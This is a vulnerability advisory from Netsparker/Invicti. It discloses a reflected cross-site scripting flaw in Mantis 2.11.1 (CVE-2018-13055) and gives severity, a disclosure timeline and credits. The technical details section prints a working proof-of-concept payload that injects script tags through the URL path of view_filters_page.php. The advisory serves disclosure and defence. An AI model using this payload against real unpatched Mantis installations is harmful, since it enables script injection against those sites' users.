Reflected Cross-site Scripting in Mantis 2.11.1

Information

Advisory by Netsparker (now Invicti)
Name: Reflected Cross-site Scripting in Mantis 2.11.1
Affected Software: Mantis 
Affected Versions: 2.11.1
Homepage: https://www.mantisbt.org/
Vulnerability: Cross-site Scripting
Severity: Medium
Status: Fixed
CVE-ID: CVE-2018-13055
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
Invicti Advisory Reference: NS-18-042

Technical Details

URL: http://{domain}/{mantis_path}/view_filters_page.php/'"--></style></scRipt><scRipt>alert(0x00CB68)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00CB68)</scRipt>

For more information on cross-site scripting vulnerabilities read the section Cross-site scripting (XSS).

Advisory Timeline

2nd July 2018- First Contact
4th July 2018 – Vendor Fixed
8th January 2019 – Advisory Released

Credits & Authors

These issues have been discovered by Ömer Çıtak while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.